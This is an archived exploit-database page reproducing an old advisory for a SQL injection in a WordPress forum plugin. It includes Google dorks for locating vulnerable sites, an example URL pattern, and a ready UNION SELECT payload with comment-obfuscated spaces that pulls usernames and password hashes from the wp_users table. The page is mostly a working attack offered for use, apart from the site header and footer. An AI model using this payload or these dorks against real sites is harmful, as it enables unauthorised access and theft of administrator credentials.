Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Blogs :: bx1946.htm

Wordpress FORUM S@L injection



all version Wordpress FORUM S@L injection
all version Wordpress FORUM S@L injection




###############################################################
#
#   Wordpress FORUM  ALL VERSİON SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
#
################################################################
#
#  DORK 1 : allinurl: forum  page_id "topic"
#
#  DORK 2 : allinurl:  page_id "topic"
#
################################################################

admin pass and name  small soo
attacker can see username and pass word under page  HOME > FORUMS > name and pass here

admin ismi ve şifre ufak yazıyo sayfa altında hemen forumun =FCst kımında

#################################################################

EXAMPLE= after "forum" inject EXPLOİT

http://www.xxxxxx/?page_id=xxx&forum= [EXPLOİT]

EXPLOIT :

S@BUN&topic=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,0,0,0,0,0/**/from%2F%2A%2A%2Fwp_users/**where%20id%201%20=%20-1

################################################################
# S@BUN           i AM NOT HACKER      S@BUN
################################################################


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH